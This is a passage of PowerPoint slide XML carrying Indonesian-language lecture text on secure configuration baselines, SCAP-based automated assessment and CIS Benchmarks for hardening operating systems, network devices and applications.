            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Baseline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyertakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otomasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SCAP) Alat yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SCAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengotomatiskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tolok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Panduan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aman</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencatatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelolaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> for Internet Security (CIS) Benchmarks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. CIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data TI. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tolok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menanggapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tolok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI dan program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PCI DSS, NIST 800-53, SOX, dan ISO 27000. Ada juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tolok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows Desktop, Windows Server, macOS, Linux, Cisco, browser web, server web, database dan server email, dan VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ESXi</a:t>
            </a:r>
            <a:r>
